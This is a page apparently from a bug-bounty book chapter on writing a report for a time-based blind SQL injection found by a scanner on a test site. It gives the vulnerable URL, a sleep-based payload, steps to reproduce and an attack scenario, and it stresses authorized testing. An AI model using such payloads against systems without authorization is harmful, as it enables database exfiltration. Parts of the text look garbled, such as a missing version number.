SQL, Code Injection, and Scanners                                           Chapter 5

            URL

            The vulnerability's URL is provided clearly in the BSBDIOJ report:
                http://webscantest.com/datastore/search_by_id.php



            Payload

            The SQLi payload is listed prominently in both the console and HTML reports under
            injected seed:

                sleep(16000/1000);


            Methodology

            Again, only use a scanner if you're authorized to! We would report this finding as coming
            from version       of Arachni.



            Instructions to Reproduce

            Rather than simply pointing to BSBDIOJ, we want to list the steps to manually recreate the
            vulnerability we're reporting. In this case, that will be navigating to the form on the affected
            page, entering the payload, and hitting Submit. There's no encoding, DOM manipulation,
            or other tricks required.



            Attack Scenario

            When a SQL database suffers from a time-based injection attack, that vulnerability allows
            an attacker to enumerate information available in a database through the tactical use of
            expressions and the SQLi-induced pause. An attack could exfiltrate business or payment
            data, sensitive tokens/authentication credentials, or any number of other critical pieces of
            information.


            Final Report

            Let's use this information to format our submission:

                CATEGORY: Blind SQLi (time-based)
                TIME: 2018-06-18 3:23 AM (3:23) UTC


                                                    [ 89 ]